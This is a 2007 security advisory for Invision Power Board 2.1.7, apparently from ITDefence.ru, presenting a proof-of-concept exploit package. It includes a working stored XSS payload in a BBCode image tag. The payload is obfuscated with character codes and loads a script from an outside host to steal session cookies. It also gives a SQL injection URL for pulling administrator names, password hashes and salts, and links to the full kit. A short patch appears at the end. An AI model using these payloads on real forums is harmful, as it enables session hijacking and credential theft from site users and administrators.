----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]=0D
=0D
						INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION=0D
Eugene Minaev underwater@itdefence.ru=0D 
				___________________________________________________________________=0D
			____/  __ __ _______________________ _______  _______________    \  \   \=0D
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /=0D
			/ /     /_//              /\        /       /      /         /     /___/=0D
			\/        /              / /       /       /\     /         /         /=0D
			/        /               \/       /       / /    /         /__       //\=0D
			\       /    ____________/       /        \/    __________// /__    // /   =0D
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\=0D
			\ \\                                                               // // /=0D
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . =0D
			. \_\\________[________________________________________]_________//_//_/ . .=0D
		 =0D
		----[ NITRO ... ]=0D
		=0D
		This vulnerability was already found before, but there was no available =0D
		public "figting" exploit for it. This POC consists of several parts - active xss generator, =0D
		JS-file, which will be caused at visiting page with xss, log viewer and special component,=0D
		which will take necessary data from MySQL forum's tables in case if intercepted session=0D
		belonged to the person with moderator privileges. =0D
		=0D
		----[ ANALYSIS ... ]=0D
		=0D
		XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for =0D
		future injetion on the forum board. As the reference it is necessary to specify the full way =0D
		up to ya.js file (in which you have already preliminary corrected way on your own). Most likely =0D
		it is necessary only to press the button. =0D
		=0D
[img]http://www.ya.ru/[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,=0D 
		105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),=0D
		head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)=0D
		style=visibility:hidden	=[/snapback].gif[/img]=0D
		=0D
		The injection can be executed only when there is available session of the user with access =0D
		in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" =0D
		function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:=0D
		=0D
		index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/*=0D
		=0D
		----[ RECORD ... ]=0D
		{=0D
		=0D
			---IP ADDRESS	sniffed ip address=0D
			---REFERER		xssed theme=0D
			---COOKIES 		xssed cookies of forum member=0D
			---USER ID		xssed user id of forum member=0D
			---ADMIN NAME	admin username=0D
			---ADMIN PASS	admin pass hash=0D
			---ADMIN SALT	admin hash salt=0D
			=0D
		}=0D
		=0D
		----[ PATCH ... ]=0D
		=0D
		FILE =0D
			sources/classes/bbcode/class_bbcode_core.php=0D
		FUNCTION=0D
			regex_check_image=0D
		LINE=0D
			924=0D
		REPLACE=0D
			if ( preg_match( "/[?&;]/", $url) )=0D
		ON=0D
			if ( preg_match( "/[?&;\<\[]/", $url) ) =0D
			=0D
			=0D
		FILE=0D
			sources/classes/bbcode/class_bbcode_core.php=0D
		FUNCTION=0D
			post_db_parse_bbcode=0D
		LINE=0D
			486=0D
		REPLACE=0D
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );=0D
		ON=0D
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );=0D
=0D
			if ( $row['bbcode_tag'] == 'snapback' )=0D
			{	=0D
				$match[2][$i] = intval( $match[2][$i] );=0D
			}  =0D
			=0D
			=0D
		=0D
www.underwater.itdefence.ru/isniff.rar=0D 
=0D
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]